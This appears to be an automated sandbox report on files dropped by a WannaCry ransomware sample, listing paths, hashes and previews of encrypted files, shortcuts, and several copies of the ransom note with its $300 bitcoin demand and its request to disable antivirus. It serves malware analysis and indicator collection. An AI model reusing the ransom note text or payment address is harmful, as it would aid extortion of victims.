.._

C:\ProgramData\Microsoft\Windows Defender\Scans\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Windows Defender\Scans\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	586008
Entropy (8bit):	7.999696302589189
Encrypted:	true
SSDEEP:	12288:lMTHeM9tCF2qGR+aXRrLcOhOZOb5vTvX12kKDkbL715/qcTSqlR8kepgMeOaf:lMT+qR5R5R3IZOpAkKqP1eq3Apgcaf
MD5:	DCCD5BF68008D08D3795A1BF649DADC7
SHA1:	C56FFE6C4B8376C9335C431AC3232088190860CA
SHA-256:	49FA1E56B9D265227FD8DD288062F09DC167A6B5FC52B173537D986F483242CA
SHA-512:	19DE5968E84E568D8507084210F3FB226762431AEE3644A32336FEDD8ED8A7F996FF9CB953530E84581D05A6D011BB69C0ECF4E8FA1D5917DA9A21CB659347FF
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......8..^%\..4~..+.N.........\...t.........(....A.........&......Q8./4c._..#..F..z.EA...ct>u.....,..x:.o.@..p"..F.e...aAy.J.C:&....B}.l..\...:7...9.uQy...l.P.l.$.m.K\w.....%......L...Vv..u,..A...<]..7.R.{.<.....1 ..w......T.P.r....So...5..Eiy.................. ..5.,.CT..#x.......0..s....;}K........X.'r..&.u..'.~./..3.~jQe..F....%....7.v...+.$\|..$.).[.UG....U..x..{@x.U.s....a..%..?.x.....0K..0.l.bs...n.....8..-.u...w.....'...h. wm.$! A4..Zc'.A.U...%.Ok.%.1.lj.n.+j.....Tkt.A..U...j.K.......e.O....s.....+...)5..-..'8.".}..b.........3K....<.Gcwo.$.B..tO...e......'.`vE...$^@.._....r./...]....<.Z..cTM>9.7,'....KL....A\..A.&?;wP.Y..d.G....,<)N.l.cD..;(A....#S....t.f..GUC..GUy.apHl.!.l.i...kIjZ........+9.#@..-j.....<.H...@..'.8.<....&Yq.a..p./%4....J4v.~2..T.>E......Q.%l..H..fBQ9}Kk..'.@.J.qN..^&.d....p..T.Q9.wk.+...?..:v.2..[w.{Q+..um!Y5.IJ..#b.....\)gi..A....*..J.Kd..qP....S....k{R!K...#.?...>.y.Ulorc)..00IV.F.En..Y.....!..TF.M.=...

C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	89816
Entropy (8bit):	7.9980081374469965
Encrypted:	true
SSDEEP:	1536:jMsec2bxNkaqIqFxsgy/fNQCn02P+YpsGNfBDxNhepgnKj6zmL5Dl7dLm6ulL6ZJ:jb9kNkaqfxsH/fv02GYpfl+6KcOlJm6P
MD5:	B92094B9BD0D5B4DDB9CB22A3C3D4C8C
SHA1:	05AB64DA925D44C611E59742CFCBDFE0DCE21E03
SHA-256:	9B1B1EF60BCBD38EC1819546F52146315D97FC2AD8914D20993DADE421A5BDD3
SHA-512:	F97C2F1DAFBF7A1F08B9CBA5E462A413508E1645B2722807BE808E48E7A2839A49B055C3B4AFC0A352B44DBC2317660B2ECDC17D08B65C33F63FD48FAC7A2C59
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......q'.....K...3I+..B.&.....t8J.....8\|.Y^...F.o...T..L.t....vd.......j....'5~x.....:..q.X....-..B%+D.......y.....M............=K....a.Q.n+...3mC-...!j.$.hp;.%......C{Y.W..#....r..@.tz....`".[.buM.S..<.l...,f.eq....fsGO......k1e.m.....7.........]......f.6q..>..d_.F..>.j...nS..U..............O....6....6$9(.i...;.Og...~..T@..6.....F.B.r&..#~../....^.e..i.....T_>R')...U........f.f..8.l...Y..Q....Lg..S.b.].....5.tC.......C...)k.vQ3.x_..c....;...TlQ..:.T.I..M....p9T.=a...f.:....dC.v...5ker@.{...\j#.cj_x.n.<[U.a...M..d.F..l....'.{...K.....M....P8Z.....G..\|..h..B}.z.\|dQ.X.D...%#4.MQ.......2...N....#.......-{.(Z...f.n...V)..t..Y0h...o.g._L.8,6..bXyjRE..jc.Ug.h....@PY....D...k?.Z...c....X..j.B..k.i..\|o.1Y.V......ku...i.9..W.:1.v...%.~......o`....Pl..7.N.0in".`MM...........PPi..^..,Dl..s...e..S.\|..S..q.M..9k.e..I..90..30..d.N<.p1..h.......1..j.....3.Oi...32...4...........5..2....u_..1.YLy..g.41.hi..Cm.0u.Jo..r@}...N...^...V.7h

C:\ProgramData\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	516712
Entropy (8bit):	7.999696226855318
Encrypted:	true
SSDEEP:	12288:LRRxEZ70X8pADzVGr8iLFRDHI14/Y/sSRQ3x0MuBeYyOOnS2nr37s0ptfOv:VRN3JiLFRHQ0S6BvuB/Hyr37xJOv
MD5:	7CD2B0076E71147768DDB9AFEC3B3D93
SHA1:	29853A506167DCBAE9953BAE4469B9157F7ABD3C
SHA-256:	D6E5FA5D7E04460BD94C5195175DC839CFA9790597A285321B00F9450CEC1B92
SHA-512:	8263E319CBD0356F8BBDAA77C8C84844968D16601B7667B592E3FD7D25C057CB99D81A86ACAE2C101830E7BB482FABBDB3A976824C8820BFC685E7A07BEB568D
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......26..@.......n.{p#k.FG..7..E.F....E..........G.$.....>......#.y..@Aa5~.%....,2..~.u.X.%.u4..s....d.....mc.d.k.....k........&.3...;............Co.......G...jf..{.p...DR}.CO^,3...Y..5Zf.4...[...Qu..4.b...bO.H....^R..I.]+....g...)..8..$....d.....H...........T....3.'.j./..{3O..4...\|l.7..MW.\.G............Z"Kd..,?.G.~...)j..&.$..T...0?.....w......G..7.,l.{mS.....!+.........l..xQ.v...$~..r.`^;..H.[....h.zV....k..>...G....S...}~.Czf..-..}......t.0.....r...`...K0.]S....O;....+1Q.8Lg..V.K....i..Jl.w.._.-8..,...~H.B...s.U..f..CB.TUN...^...]..vqM.T..>.%f....^K.c...E...;.g...)]X0..v..cr.Sb..l.D....~......D_n1.?.....`#.KR...!.u..7.bk........EL.0p.B:....._r.. ..x.A.K.nv`.\|LI...\|.....#.Z.,\|..4....N...=/2....'.63..E./.bI.p#.'..1l..v.".]-...{.[..Hh&..?8...G=.......s....- ..._............{...cK..x..`e[5D.s]Uwim.?..E~.J:.\..=....`<.P\|....i...+L.AD......i.tL..m..*.7.S..ghs.cF.~,.G#.C#....<.8p.R.a....L.....o'$0...k.h< .q.:@...`....&.

C:\ProgramData\Microsoft\Windows\Caches\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Windows\Caches\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16664
Entropy (8bit):	7.9889297399004375
Encrypted:	false
SSDEEP:	384:fq5Whv0oPZPHdqFcGXCElvrV5detVJCqbY9sFF:yEZnl9IcGLV5daCqU0F
MD5:	68E74B1FFE012B05BADA27BDC0E085A2
SHA1:	DE2314B0090EAA3EAB737F7338BF0F353C91D917
SHA-256:	182F20257D1D05FC5FA08B553224EEF2BE0FE34944722545CCF62728CA3A4BE4
SHA-512:	F0C9AFC260B7AE651AA1F25FD9D35AE233ABD18D839FE293E984527070C3D6AC13DE81663CEDBABC58DA2BDC415129F5FE9777C908CA604AE8293271D64B1FE9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..... .k....V._AM.....S.....t......6..^C....F.....R.K.7...@%%2.....E_.....x.k..0.>.....k{....d...9...\|.X...kY...h......h3n(a......?.=uU.D.<M....9.._b...>....CgY+....\Ey...R.C=../MM.9...]t.....,..{].........<.....m).?.M..o#..(p.x.1...E..CQ.?....F......@......<.%...../5sX....0?.$_......Sa..y1t/.`\`....q...'.vo"..@..&........-i...n:....J....F..l.Z.<.P.afl..Y.84..-.}-....@.l...X.l=.kZ......`y.>..Bca.......}A&.+..W.0.`...J...t...>....;(.C...A..roM^L...9n.....@17.a....."...E.u..J...MeA..6e.j.f...<.._...!.Y.X.Pa.P...y=.!....v&.$.oX.-2h}...^.xk.ICDt.~......J~C...F3...\...g)...&....5...B$B?A....k.......DHg....P..._.....I.#.......+......-._g^...=..D.....FZP......z.El..H.P"e..7..'NT...1.....0...b...H..Y.H=N"...y........pUMw.....J....F{..3\6....T`.T`..Gz@..n\.(r\;.....fZ..GI.G\|...^MnK.%.c.P.V.@2.y..!Rx.V..h.#4.b......x>...r..X*..].rJ....1p...<...4.a...6}..\,G.#..4.cx.}....QR.....ZM."..3..5...<.'M1......\|{L8{..)9../..tB.o.W......~.._...].

C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296168
Entropy (8bit):	7.999317542766359
Encrypted:	true
SSDEEP:	6144:+3lNMKGV1is5bL+0JGlW57FiHA72ApvM2IinvKopme:clN21icb60JsW5MHAXy2xxpz
MD5:	DE156146DDD767A7EA3B7143A91C0825
SHA1:	31417F9DDA18318459D259F206F4FAF654CEB56E
SHA-256:	3615C0BBE87F701A7A9C0F9BDAD87E5E0F695D0DA2DE8A0789FCF9303D2D9A72
SHA-512:	371C2B049F348E5D3A19413A6346EFC3A30951B5DB1F3DFF62370514CF08D151626AC3DF3E54FA59A2646C7E3A3E81061102E8828C054B341224C5D859CB48BF
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......=k.).L...kX;6 ...M.OP.....6.R...'....XV.Vp.1..;....FB..9.r ......tUI,.1..[........3s.)..m.7:.1D"q.sW.~...[I:...W{..7.5...9..C\|.I..nq.E...D.... S\Q#nD..d_..[.\9..k.r......<,....E5.-......K.s~2....eNV..nH\|..t...>'.....C..p.Z3...0.....]s.i..f...........2.jq..y.....8<...Fc...K.u1i.S.1p3..........u.0,....t..=[..... ..Z.....++.....8...!X\|......HM.'.1.n}_.....ccp[..wU.NpJ.<......k^o.8)f....._[.$.\.@..41....1h....6Z.......G..o.>...'.5.{m....MQ..&...Vz.n..DM.Dy..=N..3@.?.ja...~umk....'.0......o.....-.d\S...I9.....+...F.....?.\....b...Nw.ib~L.!....6..R....R...fSue.JT6I3y..a....1....u.T.A."na...~y.p.'g.v..)......W..6:.B...-$S....QM......'C...=..0e/-(....0..".+..T..G.\|.^c..R.u.!.;..y..2$ ...H..kjW...ka.m._9..".G....%;.c...W..m.M....-..P........)<.....-..\.!.\|..&9.\|.\|..H....q....._+..3..2.....0Y.m...W.b,.....Jl...........L.......l.......a.r.S..j..Y...]..........U...e..y.O.H..].q.2\|..KA.y.o..0..1.bk.md.y7M..*....W...o.....g46.5..

C:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296392
Entropy (8bit):	7.999425597330678
Encrypted:	true
SSDEEP:	6144:X/OCkX48bTTyWgUcA/QDYVjKsK7JItoEj9FYn:v7Ib/yWgtfsdtz9F6
MD5:	F98BEE7898807F57F6A8CAEBD9984685
SHA1:	B6DE023BA415167DEE8EC8AC4F5D89D4D4F2E087
SHA-256:	EF53C833E4910A4CC87BEC3E26E79755C6618732EA9416DBAAB5CE25705FC9F9
SHA-512:	36BFAB2A26BA6B178DD98F6F100368694D799D4FFEDFBAA924963605604EE32A835CDB0F1CB737BF374B2E9F16482E37A3933D73DCE96C7D4E16855AF671E485
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....`....b...cXW..z...Q.G$.9b...Q.9..O.....V..q.=.gl]..<.:..}.DH\.)..E...OH... ........\R.F`/D..T..R........K....~4=.}..f'..s..9...0.,...T.O.....Y..AP.......~;...L.....;L.R..<b...^.Q$.&QU ..o..v.W..JZ2.....RVS....4...T....>p..P..S...\|#..m....'.+/1Q..............f..~.......DN...uc...Z...\.......C.......=..`\..2...T.Ks.k...;....v.1.0...o.D.\|..t(`J. .k....G...1]...6dn..eEE.)...}SV.Q<.\B....v.6.h.g.)..[}..IH.){....j....M.S.O......-.1...S.y-.@p(D...h...}6....+.....l......y.b....2(..{.4.`p.M...........%.bi..j.S!?.....62.)N..x..6.%^f..jZ...X.jE.g .+..w....".0..R\|..@....}......1L.B.i.<p.......Ry]fQ.G.X.SY...w.%z......2-.x9T...C..v.......m\.p!At....p?p2...k?s.F......s7.`^~N.....H.cQ......03..2n..t^..[%.\.{..)\.0I..xFu...lc7E(.li..Kkw..Z.g.A.=Z.....G{.;\|..42.UN.IG..S..?4..Bn...mO#=...z.)Gi.r.wc....L.....0...#U{......a..!...Yy5.4.g..EoQ:.......o..Z6.......J..%.eW.:A.D-+EP?Zk.........R....L......K;t?.3.y.0..<..gR(# .i}..T.9..\|..Rh.;.X..2-..X

C:\ProgramData\Microsoft\Windows\Caches\{C4C1099F-F739-440C-87E6-A09DB237D75F}.2.ver0x0000000000000001.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1528
Entropy (8bit):	7.873110949048494
Encrypted:	false
SSDEEP:	24:bk+SGMCKJibgd80LVG7kzBIflIhPcBzsT7DXnbEMmUTdiMf:bkjpsbgW8VGIaIhPcBzsT/nb7OMf
MD5:	40955EDBD2143921F75E41256773FFFD
SHA1:	220D66B70FB778B76C834F1F361C5CF2892635F2
SHA-256:	70C487E7DAA361F48585D0B2525FA82D51DED0788F7E37A06A2B1A6251E20363
SHA-512:	53ABD80D152E49DF4BF502846ADAC005CB33D8CA5E92C56A114FCC74D4D02762C08C44F3D11C6015DFA43939B09E32899A56171D3C9071C29EEEE599B2176855
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....5....7...r.....b.R.@..rD..g..^....b..c.xm`......7........`.`..am=b.P..[..w..M.....^X#Et.....;W..~sS...,.2.~.........P...<.u....L.<..>..+...2.........jC.J........8.S..+..0...G..D...t..4..........Xf....H.!.....I;...h......=..e.._..]..\|..D..................\....@..C.....&.GE..pBt.X0... ..c~&&.q.....^.....A.1Q#.....)......t........U..Lk..z.Ua:.L.Rl..GP,..<`.(BB".^.Gh..J!=.J..=.p6.^IB..!..n.u.c..c...w~.Kr8...Ju.....m..^ZI0....a...e..J...#.../.1..."N..:y.C..N.....J$.%..D.+.I..<...r,.x<....4.t4.r.3Z..\,..*..&.u..G..a..^{.q?....\|......,]]...?u.#....m].6..0.}h.]....`ZR.Y}b....NbD:{..x....h4!.........p.i...d.Pi....F....L.k!.t.\......S6o.....W.?..(iZ..Y.._..h;7..I.\|...S........S..O.].n.n%~..#..~Gap.8..+.)r.6.x.p..)...N%K..o..T>.$.)..X5..(H..`Q..!.......e...GQh..I?.'...........?d..m.;.{P.$..Y......+B.2G.?.O]aw.w.Ec.$s..Gr.Ak.g.`..........'q....8...,.Vhe.,..~.c.m...z.....LG..?...;.Xp..ETk..h=U..SV'..%...t...(...L..X..P.4]C5....WV.....g2.

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	638136
Entropy (8bit):	7.999696119899993
Encrypted:	true
SSDEEP:	12288:Vp21Nh60Mx+cwXsb42YhAKQg0YmOukkZhSB1gMmQRG6y+p2aqNbFwD2ExZOLOVob:VEkQs4RqYmbkkZiMhfNuFQLOY
MD5:	41DA8C68FB1FE8A426A5F6BD1035A128
SHA1:	4434735BBA059D6B2C790EF19F1D95EFB5E32D71
SHA-256:	69BA7BC259A5BDA158008FF0D636211F1FB8FF8FC37FC2E5D51D2B780D9FF905
SHA-512:	D9884FA8805C331697EE8E3EC89CB78DF6F4C4202DD37C5128BB62DF6146BCA78BF3A175CAA5D3D9EC43823305DA81F9D001B83EC445CFA219190A627268E8C7
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....9......a}{"....)J.~..Sq.o..@.ftB.o%0.of.y(.K....T.w-."N...q....._xxQ.\QR..K...U.i............w.;}"g..0.P.WK......Y...iU..z....]._.W.V.2.6.....q...a.2...p+......1..-h`.?...7.^Lr..h..1-....A..H.h...e...X....J.I..gB!..q.a.....q...&./w.{1cm...?...............J.....[...5..4.W.......=.&.yf(O5th..\|u.....>.@.6W..K.L.a.=.?[.}. ........;:<_.19...j.O.g...1(N..{.."..^..-......{..{.R.y:.N..Z;..U.2..p.M.....F..RR.../\.... ....3#..=.7n2O......E#..9..&...cfK.>.....o..-.q..(......oyvN..c.........Ms...(....-&..Q.?..2.,$...8.....6..h...[.;.zk%:....C...'.[<.E.%...g....%.u..I.R)!..3.=..p/........ ..........u....Q].....C.....M....&8..E'.t...k....`.:j..s....p>....<.......Yi.o.[s#d.I9W.S.?...."f.......#I..~`XMQ.u..@..D.o ...x..(X3..V..>..0...,.h....V.....0.@.Y.%.^..%.-..zEU.S.}2.V.IA..r......#..JwV.vE4........1..5..(.E.&<l....t.1>....g.q...>A.............d16N..,...u^.0;.[.lI..qh.5....JM....r].N.....d.6..<'.....)yv4WY..EFOP/EwZ.........F...u.

C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\jquery-2.1.1.min[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	84536
Entropy (8bit):	7.99790181552032
Encrypted:	true
SSDEEP:	1536:8lWR9k9SY27DaqWkzkYoNWFzx8nSO0yvRh0EXXFoEjeexZlCdYvdw9RB72EXnDPv:8Qk9zahWkz7oYEnSO0y5h0KFPeexZlpo
MD5:	AE7D3C2873FBE504031B8DEC5E9A9BEA
SHA1:	D3448A503079429EC57DEFB142E12032E375A9E1
SHA-256:	5EBC3E227CFD2075EF579A32E13E2D5DC2A67BBFD766842C78DAEC34464ADA73
SHA-512:	BDC66FB1C9A8C0BBF6887526254E29D37393BDEB1FA6EBE2D76211493A0BC4C2F86609EB0DE5987D3CE835216A8181873FFC1793B876ECA09A75F326E710CF07
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......S...j. {../..a.L....l1U..cg..7...H.B..{.g....\.W...mh....Y.=.}...W....=..........`-....Y..Z.h.a?...-..~.....<..............D.JL...].a...L.....4..3.fr+..K.EnQ.S...O.9c!...."..#..=.>%._Wt..7.....LD...>..il...Gg.. Yr........U.F.....D@C(]._.......I......}!..W......2Z..5...1fi\|`......-KK.;E..C...0..T..........8.1....x....B..,....F.RS....T.a.........j.\...0...V..T.R..S........v3V.Wn,N...q..9.....2....0}H...E..xB5..=W.s.9....qe.A.d.c..7.K. ....J.....:.."..h2RPu..P7m.......1c...WGoo.n(.%...k..!.j..a..h....U...F6%.6.z....G...[.V.Z^-./D .F..\....F..'.....F1.".a.&2.B........3......r.a>..1.}...+..^`.rt..{>.2.....9q.Y....F..=..>.?p..K...ai..GgN..d.F..I...N.{........mLXo..b\|...Ys........7B...?.T?..O.Se...}C........HcT.`..w..A.yI....K3!1m....`.O.>...6....,\|..m......;qNY.R.IY.....]..-.W.......Q...r.;..ua...5....,.zb.J..?..W\.~..@.M...%t..,....G.....Z.......\..Z5j....LV`.R.mZ.B..s7.d....i.....G..N.?5.j..f.....@\.R.\;...z./....A...+.

C:\Users\user\AppData\LocalLow\Microsoft\Windows\AppCache\4IW902AO\5\kernel-1e468708[1].js.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	289832
Entropy (8bit):	7.999334393793922
Encrypted:	true
SSDEEP:	6144:lKHEfXuIqnZGlJ3QN2vyh/lwAssoRK9KP71CrT8vRt+CC:EEfeIqnk1QljlK5S
MD5:	EC199F3D493155B5DCB569712E034E87
SHA1:	E21A87A5A27FA7F3F41A40A6152D73AAF3AE710E
SHA-256:	DBFA5360335721E7D130871E975DF32AE96598DD833244B86660A40955B45E9D
SHA-512:	75442CD550C3BDD427F854FBBB7F5F978ABC0D351652A0931E29A1663A397CBBA6FD44F401633552F9C986D40397C15BE59015EC3A72E8B131330BE38BF5C540
Malicious:	true
Reputation:	unknown
